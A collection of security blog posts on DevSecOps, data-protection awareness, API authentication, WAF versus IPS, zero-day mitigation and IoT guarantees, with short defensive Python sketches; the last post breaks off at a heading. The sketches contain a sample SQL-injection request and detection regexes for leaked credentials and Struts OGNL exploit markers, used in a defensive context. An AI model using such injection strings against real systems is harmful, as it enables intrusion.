The primary objective of DevSecOps is to integrate security at the early stages of development on the process side, and to make sure everyone in the team is responsible for security. It evangelises security as a strong glue that holds the bond between development and operations as a single task force. In DevSecOps, security ought to be part of the automation via tools, controls and processes.

The traditional SDLC (software development life cycle) often perceives security as a toll gate at the end, validating the effort against visible threats. In DevSecOps, security is everywhere, at all stages/phases of development and operations. It is embedded right into a life cycle that has continuous integration between the drawing pad, security tools, and the release cycle.

As Gartner documents, DevSecOps can be depicted graphically as the rapid and agile iteration from development into operations, with continuous monitoring and analytics at the core.

Photo by Redmine

Another key driving factor for DevSecOps is the fact that perimeter security is failing to keep up with the increasing number of integration points and the blurring of trust boundaries. It is getting fuzzier where the perimeter lies in this cyber ecosystem. It is evident that software has to be inherently secure itself, without relying on border security controls. Rapid development and releases shorten the supply-chain timeline for implementing custom controls like filters, policies and firewalls.

I have tried to make the terms well understood in this series; there are many challenges faced by organizations, and possible solutions, which I shall cover in the next article.
Stay tuned.

An Interview by Timecamp on Data Protection


A few months back I was featured in an interview on Data Protection Tips with Timecamp. Only a handful of questions, but they are well articulated for any organisation that is proactive and wants to address security in corporations, and their employees' and customers' responsibilities.

--

How do you evaluate people's awareness regarding the need to protect their private data?

This is an exciting question, as we have often faced challenges during data protection training in evaluating with certainty that a person has understood the importance of data security and is not just cramming for the test.

Enterprise Security is as closely related to the systems as with the people interacting with them.

One way to perform evaluations is to include surprise checks and discussions within the teams. A team of security-aware individuals is trained and then asked to carry out such inspections. For example, if a laptop is found logged in and unattended for long, the team confiscates it and submits it to a C-level executive (e.g. CIO or COO). As a consultant, I have also worked on an innovative solution that uses such awareness questions as a "second level" check while logging into intranet applications. And we are all aware of phishing campaigns that management can run on all employees to measure their receptiveness to such emails. But these must be followed up with training on how an individual can detect such an attack, and what they can do to avoid falling prey to such scammers in the future. We must understand that while data protection is vital, awareness training and assessment should not become speed bumps in the daily schedule.

These awareness checks must be performed regularly without adding much stress for the employee. The more effort they demand, the more the employee will try to bypass or avoid them. Security teams must work with employees and support their understanding of data protection. Data protection must be the inception of understanding security, not a forced argument.

Do you think that an average user pays enough attention to the issue of data protection?

Data protection is an issue which can only be dealt with through cumulative effort, and though each one of us cares about privacy, few do so collectively within an enterprise. It is critical to understand that security is a culture, not a product. It needs an ongoing commitment to providing a resilient ecosystem for the business. Social engineering is on the rise with phishing attacks, USB drops, and fraudulent calls and messages. An employee must understand that a casual approach towards data protection can bring the whole business to ground zero. And the core business must be cautious when doing data identification and classification. The business must discern the scope of its applications, and specify the direct/indirect risk if the data gets breached. A data breach is not only an immediate loss of information but a ripple effect leading to disclosure of the enterprise's inner sanctum.

Now, how close are we to achieving this? Unfortunately, we are far from the point where an "average user" accepts data protection as a cornerstone of success in a world where information is the asset. Businesses consider security a tollgate which everyone wants to bypass, because they neither like riding with it nor being assessed by it. Reliable data protection can be achieved only when it's not a one-time effort, but the base on which we build our technology.

Unless and until we can use the words "security" and "obvious" in the same line, positively, it will always be a challenge which the "average user" tries to deceive rather than achieve.

Why is the introduction of procedures for the protection of federal information systems and organisations so important?

Policies and procedures are essential for the protection of federal or local information, as they harmonise security with usability. We should understand security is a long road, and when we attempt to protect data, it often has quirks which confuse or discourage an enterprise as it evolves. I have witnessed many Fortune 500 firms safeguarding their assets and getting absorbed into the effort like it's a black hole. They invest millions of dollars and still don't get on par with the scope and requirements. Therefore, it becomes essential to understand the needs of the business, the data it handles, and which procedures apply to its range. Specifically, procedures help keep teams aligned on how to implement a technology or a product for the enterprise. Team experts, or SMEs, usually have telescopic vision in their own domain, but a blind eye to the broader defence in depth. Their skills tunnel their view, but a procedure helps them stay in sync with the current security posture and the projected roadmap. A procedure also reduces the probability of error while aligning with a holistic approach towards security. It dictates what to do and how, thereby leaving a minimal margin of misunderstanding when implementing sophisticated security measures.

Are there any automated methods to test the data susceptibility to cyber-attacks, for instance, by the use of frameworks like Metasploit? How reliable are they in comparison to manual audits?

Yes, there are automated methods to perform audits, and to some extent they are well devised to detect the low-hanging fruit. In simpler terms, a computerised assessment has three key phases: information gathering, tool execution to identify issues, and report review. Security-aware companies, and the ones that fall under strict regulations, often integrate such tools into their development and staging environments. This CI (continuous integration) keeps the code clean and checks for vulnerabilities and bugs on a regular basis. It also helps smooth out errors that might have crept in through reused code or outdated functions. On the other side, there are tools which validate the sanity of the production environment and also perform regular checks on the infrastructure and data flows.
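To make the idea concrete, here is a toy sketch of one kind of check such a CI pipeline might run on every commit. The regex rules and the sample file contents are purely illustrative; real scanners ship far richer rule sets.

```python
import re

# Illustrative rules only; a real secret scanner uses many more patterns,
# entropy checks, and allow-lists to cut false positives.
RULES = {
    "hardcoded password": re.compile(r"password\s*=\s*['\"][^'\"]+['\"]", re.I),
    "AWS access key id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private key header": re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"),
}

def scan(source, filename="<stdin>"):
    """Return (filename, line_no, rule) findings for one source file."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        for rule, pattern in RULES.items():
            if pattern.search(line):
                findings.append((filename, line_no, rule))
    return findings

# A commit containing two obvious leaks; a CI job would fail the build here.
code = 'db_password = "hunter2"\nkey = "AKIAABCDEFGHIJKLMNOP"\n'
for finding in scan(code, "settings.py"):
    print(finding)
```

Wired into the pipeline as a pre-merge gate, a check like this catches the low-hanging fruit automatically and leaves the subtler issues to the manual audits discussed next.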

Are these automated tools enough? No. They are not "smart" enough to replace manual audits.

They can validate configurations and find issues in the software, but they can't evolve with the threat landscape. Manual inspections, on the other hand, provide peripheral vision while verifying the ecosystem's resilience. It is essential to have manual audits, and to use their feedback to assess, and further tune, the tools. If you are working in a regulated and well-observed domain like finance, health or data collection, the compliance officer will always rely on manual audits for final assurance. The tools are still there to support, but remember, they are only as good as they are programmed and configured to be.

How to present procedures preventing attacks in one's company, e.g., to external customers who demand an adequate level of data protection?

This is a paramount concern, and thanks for asking this. External clients need to "trust you" before they can share data or plug you into their organisation. The best approach that has worked for me is assurance through what you have, and how well you are prepared for the worst. The cyber world is very fragile; earlier we used to say "if things go bad ..." but now we say "when things go bad ...".

This means we have accepted the fact that an attack is imminent if we are dealing with data/information. Someone is watching, waiting to strike at the right time, especially if you are a successful firm. Now, assurance can be achieved by demonstrating the policies you have in place for Information Security and Enterprise Risk Management. These policies must be supplemented with standards which identify the requirements, and with procedures as the how-to documents for implementation. In most cases, if you have to assure the client of your defence in depth, the security policy, architecture and a previous third-party assessment/audit suffice. In rare cases, a client may ask to perform its own assessment of your infrastructure, which is at your discretion. I would recommend making sure that your policy covers not only security but also incident response, to reflect your preparedness for a breach/attack.

On the other hand, if your end customers want assurance, you can reflect that by being proactive on your product, blog, media etc. about how dedicated you are to securing their data. For example, the kind of authentication you support reflects your commitment to protecting the vault. Whether it's mandated or not depends on usability and UI, but supporting it shows your commitment to addressing security-aware customers and understanding the need of the hour.

--
Published at https://www.timecamp.com/blog/index.php/2017/11/data-protection-tips/ with special thanks to Ola Rybacka for this opportunity.

Don’t be a security snob. Support your business team!


There have been many times that access controls were discussed in meetings related to web development. In an interconnected world of APIs, it is very important to understand the authentication of these endpoints. One of the best approaches, which I always vouch for, is mutual authentication with SSL certificates (or 2-way SSL). Most of the time it is viable, but it fails when either party can't support it (hence not mutual). So, what do you do when the business can't implement your "security requirement"?

The role of security is not to hinder the business, but to support it. It has to act as a pillar, and not a tollgate. We all know, that's audit!

Are you a security snob?
The rules/regulations made by us, auditors and regulators are there to make sure the architecture, implementation and roll-out are secure, and the information is tightly controlled. They are in no way meant to add to the miseries of developers at the last stage of go-live. The security requirements must be clear right from the design phase. A security architect must be appointed to work in accordance with industry standards and the security nitty-gritty. Sometimes the security team learns that a few important requirements have not been considered and the project is now at its final stage. What should security do? Bring the business to a grinding halt? Send the developers back to the drawing board? No and no! Don't be a snob!

Look forward and figure out the workarounds: strong mitigation steps that lower the risk. As long as you can reduce the risk to a minimum using a WAF, access controls, white-listing etc., the business can plan to "fix" it in the next release. Make sure the business understands the risk - brand or financial - and if the risk is too high, involve the C-suite executives. But support the business instead of bashing them with "you didn't do this, or that". That is counter-productive and doesn't help either party.

In most cases the "business" pays the IT security paychecks, and it's your (the security team's) job to make security look not like an overhead, but like an investment!
IT security does NOT generate money. So don't point fingers - hold hands!

Now, back to mutual authentication - what if two-way SSL is not available? Is IP white-listing combined with API credentials a possible option? Yes, if the IP is not shared by the whole network and the traffic runs over a secure channel. It's a strong measure that restricts the participating parties to talking 1:1 on an encrypted channel. But then I've been asked: what about IP spoofing? Come on, guys! IP spoofing doesn't work the way you think. TCP requires a handshake; how do you expect the handshake to succeed when the spoofed source never ACKs the SYN-ACK? Remember, the "actual IP" is not expecting the SYN-ACK, and the return traffic never reaches the "malicious IP". So IP spoofing over the Internet is out of the picture.
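As a minimal sketch of the IP white-listing control described above (the addresses and function names are illustrative, not from any particular product), an API endpoint can check the connected peer's address against an allowlist. The check is trustworthy precisely because the TCP handshake has already completed:

```python
import ipaddress

# Hypothetical allowlist of partner IPs permitted to call the API.
ALLOWED_PEERS = {
    ipaddress.ip_address("203.0.113.10"),
    ipaddress.ip_address("203.0.113.11"),
}

def is_peer_allowed(remote_addr: str) -> bool:
    """Return True only when the connecting IP is on the allowlist.

    This check is meaningful because the TCP handshake has already
    completed: a spoofed source IP never receives the SYN-ACK, so it
    cannot establish the session this check runs inside.
    """
    try:
        return ipaddress.ip_address(remote_addr) in ALLOWED_PEERS
    except ValueError:
        return False  # malformed address: reject outright
```

Combined with API credentials and TLS on the channel, this gives the 1:1 restriction described above even when two-way SSL isn't on the table.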

As a security specialist, try to understand that there are various ways to strengthen security without being a pain in the ass. There are ways to implement compensating controls: make sure the traffic is encrypted, access is tightly restricted, and the risk is significantly lowered. If you can do this, you can definitely help the business go live and give them time to manage security expectations more constructively.

Cheers, and be safe.

Design For Behavior, Not Awareness

October was National Cybersecurity Awareness Month. Since today is the last day, I figured now is as good a time as any to take a contrarian perspective on what undoubtedly many organizations just did over the past few weeks; namely, wasted a lot of time, money, and good will.

Most security awareness programs and practices are horrible BS. This extends out to include many practices heavily promoted by the likes of SANS, as well as the current state of "best" (aka, failing miserably) practices. We shouldn't, however, be surprised that it's all a bunch of nonsense. After all, awareness budgets are tiny, the people running these programs tend to be poorly trained and uneducated, and in general there's a ton of misunderstanding about the point of these programs (besides checking boxes).

To me, there are three kinds of security awareness and education objectives:
1) Communicating new practices
2) Addressing bad practices
3) Modifying behavior

The first two areas really have little to do with behavior change so much as they're about communication. The only place where behavior design comes into play is when the secure choice isn't the easy choice, and thus you have to build a different engagement model. Only the third objective is primarily focused on true behavior change.

Awareness as Communication

The vast majority of so-called "security awareness" practices are merely focused on communication. They tell people "do this" or "do that" or, when done particularly poorly, "you're doing X wrong idiots!" The problem is that, while communication is important and necessary, rarely are these projects approached from a behavior design perspective, which means nobody is thinking about effectiveness, let alone how to measure for effectiveness.

Take, for example, communicating updated policies. Maybe your organization has decided to revise its password policy yet again (woe be unto you!). You can undertake a communication campaign to let people know that this new policy goes into effect on a given date, and maybe even explain why the policy is changing. But that's about it. You're telling people something theoretically relevant to their jobs, but not much more. This task could be done just as easily by your HR or internal communications team as by anyone else. What value is being added?

Moreover, the best part of this is that you're not trying to change a behavior, because your "awareness" practice doesn't have any bearing on it; technical controls do! The password policy is implemented in IAM configurations and enforced through technical controls. There's no need for cognition by personnel beyond "oh, yeah, I now have to construct my password according to new rules." It's not like you're generally giving people the chance to opt out of the new policy, and there's no real decision for them to make. As such, the entire point of your "awareness" is communicating information, but without any requirement for people to make better choices.

Awareness as Behavior Design

The real role of a security awareness and education program should be on designing for behavior change, then measuring the effectiveness of those behavior change initiatives. The most rudimentary example of this is the anti-phishing program. Unfortunately, anti-phishing programs also tend to be horrible examples because they're implemented completely wrong (e.g., failure to benchmark, failure to actually design for behavior change, failure to get desired positive results). Yes, behavior change is what we want, but we need to be judicious about what behaviors we're targeting and how we're to get there.

I've had a strong interest in security awareness throughout my career, including having built and delivered awareness training and education programs in numerous prior roles. However, it's only been the last few years that I've started to find, understand, and appreciate the underlying science and psychology that needs to be brought to bear on the topic. Most recently, I completed BJ Fogg's Boot Camp on behavior design, and that's the lens through which I now view most of these flaccid, ineffective, and frankly incompetent "awareness" programs. It's also what's led me to redefine "security awareness" as "behavioral infosec" in order to highlight the importance of applying better thinking and practices to the space.

Leveraging Fogg's models and methods, we learn that Behavior happens when three things come together: Motivation, Ability, and a Trigger (aka a prompt or cue). When designing for behavior change, we must then look at these three attributes together and figure out how to specifically address Motivation and Ability when applying/instigating a trigger. For example, if we need people to start following a better, preferred process that will help reduce risk to the organization, we must find a way to make it easy to do (Ability) or find ways to make them want to follow the new process (Motivation). Thus, when we tell them "follow this new process" (aka Trigger), they'll make the desired choice.
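The interplay of those three attributes can be sketched as a toy model. To be clear, Fogg's model is qualitative; the numeric scores and the threshold below are invented purely for illustration:

```python
from dataclasses import dataclass

@dataclass
class BehaviorDesign:
    """Toy rendering of Fogg: Behavior = Motivation + Ability + Trigger."""
    motivation: float  # 0.0-1.0: how much people want to comply
    ability: float     # 0.0-1.0: how easy the secure choice is
    triggered: bool    # has the prompt/cue ("follow this process") landed?

    def behavior_occurs(self) -> bool:
        # A trigger only works when motivation x ability clears some
        # activation threshold; raising EITHER factor crosses the line.
        return self.triggered and (self.motivation * self.ability) > 0.25

# Telling people "follow the new process" (Trigger) fails when it's hard:
hard = BehaviorDesign(motivation=0.9, ability=0.2, triggered=True)
# Making the secure choice easy lets the very same trigger succeed:
easy = BehaviorDesign(motivation=0.9, ability=0.8, triggered=True)
```

The point of the sketch is the design lever: when a prompt isn't producing the behavior, you tune Motivation or Ability rather than shouting the prompt louder.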

In this regard, technical and administrative controls should be buttressed by behavior design whenever a choice must be made. Sadly, this isn't generally how security awareness programs view the space; they just focus on communication (a type of Trigger) without much regard for also addressing Motivation or Ability. In fact, many security programs experience frustration and failure because what they're asking people to do is hard, which means the average person is not able to do what's asked. Put a different way, the secure choice must be the easy choice, otherwise it's unlikely to be followed. Similarly, research has shown time and again that telling people why a new practice is desirable greatly increases their willingness to change (aka Motivation). Seat belt awareness programs are a great example of bringing together Motivation (particularly focused on the negative outcomes of non-compliance, such as death or serious injury, as well as fines and penalties), Ability (it's easy to do), and Triggers to achieve a desired behavioral outcome.

Overall, it's imperative that we start applying behavior design thinking and principles to our security programs. Every time you ask someone to do something different, you must think about it in terms of Motivation, Ability, and Trigger, and then evaluate and measure effectiveness. If something isn't working, rather than devolving into a blame game, look at these three attributes and determine whether a different approach is needed. And, by the way, this may not necessarily mean making the secure choice easier so much as making the insecure choice more difficult (for example, someone recently noted on Twitter that they simply added a wait() to their code to force deprecation over time).

Change Behavior, Change Org Culture

Another interesting aspect of this discussion on behavior design is this: organizational culture is the aggregate of behaviors and values. That is to say, when we change behaviors, we are in fact changing org culture, too. The reverse is also true: if we find bad aspects of org culture leading to insecure practices, we can trace those back to the underlying behaviors and then start designing for behavior change. In some cases, we may need to break the behaviors into chains of behaviors and tackle things more slowly over time, but looking at the world through this lens can be quite enlightening. Similarly, looking at the values ensconced within org culture lets us better understand motivations. People generally want to perform their duties, and to do a reasonably decent job at it. This is generally how performance is measured, and those duties and performance measures are typically aligned with outcomes and - ultimately - values.

One excellent lesson that DevOps has taught us (there are many) is that we absolutely can change how the org functions... BUT... it does require a shift in org culture, which means changing values and behaviors. These sorts of shifts can be done either top-down or bottom-up, but the reality is that top-down is much easier in many regards, whereas bottom-up requires that greater consensus and momentum be built to achieve a breakthrough.

DevOps itself is cultural in nature and focuses heavily on changing behaviors, ranging from how dev and ops function, to how we communicate and interact, and so on. Shortened feedback loops and creating space for experimentation are both behavioral, which is why so many orgs struggle with how to make them a reality (that is, it's not simply a matter of better tools). Security absolutely should be taking notes and applying lessons learned from the DevOps movement, including investing in understanding behavior design.

---
To wrap this up, here are three quick take-aways:

1) Reinvent "security awareness" as "behavioral infosec" and shift to a behavior design approach. Behavior design looks at Motivation, Ability, and Triggers in effecting change.

2) Understand the difference between controls (technical and administrative) and behaviors. Resorting to basic communication may be adequate if you're implementing controls that take away choices. However, if a new control requires that the "right" choice be made, you must then apply behavior design to the project, or risk failure.

3) Go cross-functional and start learning lessons from other practice areas like DevOps and even HR. Understand that everything you're promoting must eventually tie back into org culture, whether it be through changes in behavior or values. Make sure you clearly understand what you're trying to accomplish, and then make a very deliberate plan for implementing changes while addressing all appropriate objectives.

Going forward, let's try to make "cybersecurity awareness month" about something more than tired lines and vapid pejoratives. It's time to reinvent this space as "behavioral infosec" toward achieving better, measurable outcomes.

WAF and IPS. Does your environment need both?

I have been in a fair number of discussions with management on the need for a WAF and an IPS; they often confuse the two and their basic purposes. The question usually comes up after a pentest or vulnerability assessment: if I can't fix this vulnerability, shall I just put an IPS or WAF in front to prevent the intrusion/exploitation? Sometimes these products are even considered a silver bullet to thwart attackers instead of fixing the bugs. So let me tell you - this is not good!

These security products are well suited to protect against something "unknown" or something you have "unknowingly missed". They are not a silver bullet or an excuse to keep systems/applications unpatched.

Security shouldn't be an AND/OR case. The more the merrier - provided everything is configured properly and each product has a distinct role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS, it's time to understand that it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape - it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster and a step ahead. These adversaries also piggy-back on existing threats to launch their exploits. Often something that starts as simply as a DDoS to overwhelm your network ends in an application layer attack. So network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be in place with all the bells and whistles!

Nevertheless, whether it's a WAF or an IPS, each has its own purpose, and though they can't replace each other, they have gray areas in which you can rest some of your risks. This blog will try to address these gray areas and the associated differences to make life easier when it comes to choosing between a WAF (Web Application Firewall) and an IPS (Intrusion Prevention System). The assumption is that both are modern products and the IPS has deep packet inspection capabilities. Now, let's understand the infrastructure, environment and scope of your golden eggs before we take a call on the best way to protect the data:

  1. If you are protecting only "web applications" running on HTTP sockets, then a WAF is enough. An IPS will be the cherry on the cake.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP etc. - then a WAF is of less use, as it can't inspect non-HTTP traffic. I would recommend a deep packet inspection IPS.
  3. A WAF must not be considered an alternative to a traditional network firewall. It works at the application layer and hence is primarily useful for HTTP, SSL (decryption), JavaScript, AJAX, ActiveX, and session management kinds of traffic.
  4. A typical IPS does not decrypt SSL traffic, and is therefore insufficient for packet inspection on an HTTPS session.
  5. There is a wide difference in traffic visibility and base-lining for anomalies. While a WAF has an "understanding" of the traffic - HTTP GET, POST, URL, SSL etc. - the IPS only sees network traffic and can therefore do layer 3/4 checks - bandwidth, packet size, raw protocol decoding/anomalies - but not GET/POST or session management.
  6. An IPS is useful where RDP, SSH or FTP traffic has to be inspected before it reaches the box, to make sure the protocol is not tampered with or wrapped in another TCP packet etc.

Both technologies have matured and share many gray areas, but understand that a WAF knows and captures the contents of HTTP traffic to see if there is SQL injection, XSS or cookie manipulation, whereas an IPS has little or no understanding of the underlying application and therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is exfiltrating confidential data, or even sending a harmful parameter to your application - it will let it through as long as it's a valid HTTP packet.
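That visibility gap can be sketched in a few lines: a WAF parses HTTP semantics (method, URL, individual parameter values) and can flag a malicious parameter, while an IPS sees only opaque bytes and layer 3/4 properties. The SQLi pattern and the size threshold below are deliberately simplistic illustrations, not production rules:

```python
import re
from urllib.parse import urlparse, parse_qs

# Toy SQL-injection signature; real WAF rulesets are far richer.
SQLI_PATTERN = re.compile(r"('|--|\bUNION\b|\bOR\b\s+1=1)", re.IGNORECASE)

def waf_inspect(request_line: str) -> bool:
    """WAF view: parse the HTTP request and examine parameter values."""
    method, url, _version = request_line.split(" ", 2)
    params = parse_qs(urlparse(url).query)  # URL-decodes each value
    return any(SQLI_PATTERN.search(v)
               for values in params.values() for v in values)

def ips_inspect(packet: bytes) -> bool:
    """IPS-without-app-knowledge view: only layer 3/4 properties,
    e.g. an oversized-packet anomaly; the payload stays opaque."""
    return len(packet) > 65535

malicious = "GET /login?user=admin'%20OR%201=1-- HTTP/1.1"
```

The WAF flags the injected parameter; the same bytes sail straight past the size-only check, which is exactly the point made above.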

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach to security - how to make sure the network and applications are resilient to the complex attacks and threats lurking at your perimeter, or inside.

Be safe.

I know I haven't patched yet, and there's a zero-day knocking at my door

Patching is important, but let's agree it takes time. It takes time to test and validate the patch in your environment, and to check application compatibility with the software and the underlying services. And then, one fine day, an adversary hacks your server through this un-patched code while you are still testing. It breaks my heart, and I wonder: what can be done in the delta period while the team is testing the patch? The adversary, on the other hand, is busy either reversing the patch or using a zero-day to attack your systems. Once a patch is released, it's a race:

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team, or the team managing the vulnerable server. They have their SLAs for applying updates to the OS or application servers. In my experience, a high severity patch has to be applied within 15 days, medium within 30 days, and low within 45 days. If the criticality is severe enough, it should be managed in 24 to 48 hours, with enough testing of functionality, compatibility, and test cases with the application team or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but it's getting more realistic and frequent. The recent Apache Struts vulnerability did enough damage to big companies like Equifax. I have already addressed this issue, and the need for alternatives such as a WAF in the secure SDLC, in an earlier blog post.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero-day for your web application or underlying server, and you are busy patching - but what other security controls do you have in place?
Ask yourself these questions,

  1. Do I understand the zero-day exploit? Does it affect my application, or a particular feature?
  2. Do I have a product/tool for prevention at the application layer on the network perimeter that can filter bad requests - a network WAF (Web Application Firewall), network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/tool for prevention at the application layer on the host - a host-based IPS, WAF etc.?
  4. Can I just take the application offline while I patch?
  5. What are the threat model and risk appetite if exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it from spreading across my environment?

Let's understand how these answers will support your planning to develop a resilient environment,

>> Understanding of the zero-day exploit

You know there's an exploit in the wild, but has your security team or your devops crew actually taken a look at it? Did they find the exploit and understand its impact on your application? It is very important to understand what you are dealing with before you plan to secure your environment. Not all exploits are in scope for your environment, due to limitations, frameworks, plugins etc. So do a bit of research, ask questions, and set your timelines accordingly. Best case, you learn the exact pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it. Blocking is most effective at the perimeter - the earlier, the better. And if you have done good research on the exploit, or on the threat vector that can affect you, take note of the attack pattern and find a way to block it at the perimeter while you patch the application.
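One concrete form of this is a "virtual patch": a quick perimeter rule that drops requests matching the known exploit pattern while the real fix is still in testing. As a hedged sketch (using the Apache Struts CVE-2017-5638 OGNL-in-Content-Type vector, mentioned earlier, as the example signature; adapt the pattern to your own research):

```python
import re

# Example signature: OGNL expression markers injected into the
# Content-Type header, as in the Struts CVE-2017-5638 exploit.
OGNL_MARKER = re.compile(r"%\{|\$\{")

def block_request(headers: dict[str, str]) -> bool:
    """Return True if the request should be dropped at the perimeter."""
    content_type = headers.get("Content-Type", "")
    return bool(OGNL_MARKER.search(content_type))
```

A rule this narrow is cheap to deploy on a WAF or reverse proxy, buys time for proper patching, and is easy to test for the false positives warned about below.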

>> Prevention at the application layer for host

There are times when, even though you know the pattern and the details of the exploit, the network perimeter is incapable of blocking it - for example, when SSL is offloaded on the server or the load balancer. In that case, make sure the host itself knows what traffic is expected and blocks everything else, including anomalies. This can be achieved with host-based protection: an IPS or a WAF.
Even a small tool like Tripwire can monitor directories and files to make sure an attacker can't create files - or at least that you get an alert in time to react. This can make a huge difference!
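As a rough illustration of that kind of file-integrity monitoring (a minimal tripwire-style sketch, not the actual Tripwire tool): baseline a directory's file hashes, re-scan later, and report anything added or modified. A real deployment would store the baseline out-of-band so an attacker can't rewrite it along with the files:

```python
import hashlib
from pathlib import Path

def snapshot(directory: str) -> dict[str, str]:
    """Map each file under `directory` to its SHA-256 digest."""
    return {
        str(p): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in Path(directory).rglob("*")
        if p.is_file()
    }

def diff(baseline: dict[str, str], current: dict[str, str]) -> list[str]:
    """Return paths that were added or whose contents changed."""
    return sorted(
        path for path, digest in current.items()
        if baseline.get(path) != digest
    )
```

Run `snapshot()` at deploy time, re-run it on a schedule, and alert on any non-empty `diff()` - a dropped web shell or modified binary shows up immediately.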

Note: make sure the IPS (network/host) is capable of deep packet inspection. If the pattern can be blocked on the WAF with a quick rule, do it - and make sure it doesn't generate false positives that could impact your business. Also monitor the WAF for alerts, which can tell you whether there have been failed attempts by adversaries. Remember, attackers won't lead with their best weapon; usually it starts with information gathering, uploading files, or executing known exploits before they customize the attack for their needs.

You have very high chances to detect adversaries while they are gathering insights about you. Keep a keen eye on any alert from production environment.

>> Taking application offline

Is it possible to take the application offline while you patch the software? That depends on the application's exposure, its CIA (Confidentiality, Integrity and Availability) rating, and the business impact assessment that has been performed. If taking it offline can speed up the process and reduce the exposure without hurting your business, do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess the application and perform threat modeling. This is required because not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal, which substantially reduces the exposure and the underlying impact! Ask your team: is the application Internet-facing, how many users does it have, what kind of data does it handle etc. - and act accordingly.

>> Brace for impact

Finally, if things still look blurry, start prepping for impact. Try to minimize it by validating and restricting access to the server. Perform some sanity checks and implement controls like:

  1. Least-privilege accounts for application use
  2. Minimal interaction with the rest of the production environment
  3. Restricted database requests and responses to limit data exfiltration
  4. Keeping the incident management team on high alert.

Incident management - are you sure you haven't already been breached?

Now, what are the odds that while you are reading this blog, answering all the questions and getting ready, you haven't already been compromised? Incident statements used to begin with "What if...", but now they begin with "When...". So make sure all your monitoring systems are reporting anomalies and someone is watching them well. These tools are only as good as the human being responsibly validating the alerts. Once an alert is flagged red, a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blogpost. Don't be one of them.

Once you have addressed these questions, you should have a fairly resilient environment that can either mitigate or absorb the impact. Be safe!

5 Ways to Future-Proof IoT Devices

The absence of regulation is part of what has enabled the software innovation we see today. But as hardware and software merge, and the shelf life of software becomes the shelf life of hardware, we are going to need a number of guarantees to ensure that the benefits keep outweighing the risks.

I have never replaced my thermostat. Nor the control system of my lights in my flat. People buy a new oven or refrigerator every 10 years, a new car every 20 years maybe. And these are all run by software, old software, with bugs. And that is “fine” (mind the quotes), to the extent that someone takes responsibility for the system or solution as a whole, the collection of all these parts with a single brand name on the box that is legally responsible. Now think IoT. Thousands of individual vendors who sit mostly abroad, offshore code development with for the most part a lack of teams, unity or any other form of structure or legal jurisdiction for that matter. Low to no profit margins for technology sold by the lowest bidder where neither the buyer nor the seller have any interest in security.

The chip-maker of the device says they just sell chips, the manufacturer says they just implemented the chips and put them on the board, the software makers build the software for maybe hundreds of chips, ignoring some of the extra features and weaknesses that come with certain components. The product ships and problems are found at a later stage either through design errors or implementation errors while implementing a piece of software that has vulnerabilities. And this is where we are today.

Not a single snowflake feels responsible for the avalanche.

So, five things I would like to see as part of a basic set of guarantees when purchasing some of these products in the future:

  1. Guaranteed life expectancy
    When IoT vendors say they offer “life time support,” it is not your life, or the product's life; it is the life of the company. We saw this with Revolv last year. Guaranteeing a certain number of years of product focus, updates, community support (e.g. forums), as well as guaranteeing that the device will keep working, is paramount. This means tracking the life cycle of the technology inside the devices, and ensuring that whatever cloud services are being used will still be there and cannot be interrupted or hijacked afterwards.
  2. Privacy and data handling transparency
    Inform the consumer where the data is being saved, i.e. in which physical country, how long the data will be kept, as well as what data is being saved and to what level of detail. Give consumers the option to remove all data produced by the device if they can prove ownership of it. I have no problem waiving some of my rights when telling the IoT vendor, and potentially the world, that I like to make something that needs the pizza setting of my IoT oven on Sunday mornings - but inform me first. Will my data go to a European cloud or a US cloud, and what laws can be enforced upon my data and the correlations based on my data?
  3. Technology transparency
    To the extent possible, inform the consumer about what technology is being used, e.g. open source software and licensed software. Food manufacturers have to ensure correct labeling of their products as far as ingredients go. Why not do the same for technology, for the individual parts or software components, at least to some extent, so that consumers can make informed choices about what they can and want to use?
  4. Security feature transparency
    Does the product allow management through a cloud service with two-factor authentication? Or only Bluetooth or Wifi? Will it detect your neighbor trying to log on to your device? Can someone break into the device remotely? What features a device has will hopefully start influencing the buying behavior of consumers. If you want all devices to use only the cloud for remote control, then that should be a choice you can make by looking at the box.
  5. Planned obsolescence
    A more difficult one, but an important one. For IoT that is more sensitive or even vital, a shut-down process should be explored so that a device can be shut down when it has exceeded its life or has been declared end-of-life. When reliance becomes dependence, planning is required to ensure that the benefits and added value of the product can be sustained. This is easier with pacemakers and other devices that receive a lot of care and tracking. But for devices that are basically enable-and-forget, it implies being able to signal the remaining lifetime to the owner, and thus knowing who the owner is. That last part may be the more difficult issue: it has been tried before, for example by tying domain names to people for the purpose of reporting abuse, and it creates another potential privacy problem if the information is leaked. This is a sensitive topic, and more discussion is needed on how devices can be categorized and what the possibilities are. It can also lead to abuse from the vendor side: printer vendors were very quick to jump on the planned obsolescence track, flagging ink cartridges as empty to force customers to buy more. More discourse on this subject is needed from all sides: designers, vendors, suppliers and consumers.

Quit Talking About "Security Culture" – Fix Org Culture!

I have a pet peeve. Ok, I have several, but nonetheless, we're going to talk about one of them today. That pet peeve is security professionals wasting time and energy pushing a "security culture" agenda. This practice of talking about "security culture" has arisen over the past few years. It's largely coming from security awareness circles, though it's not always the case (looking at you anti-phishing vendors intent on selling products without the means and methodology to make them truly useful!).

I see three main problems with references to "security culture," not the least of which being that it continues the bad old practices of days gone by.

1) It's Not Analogous to Safety Culture

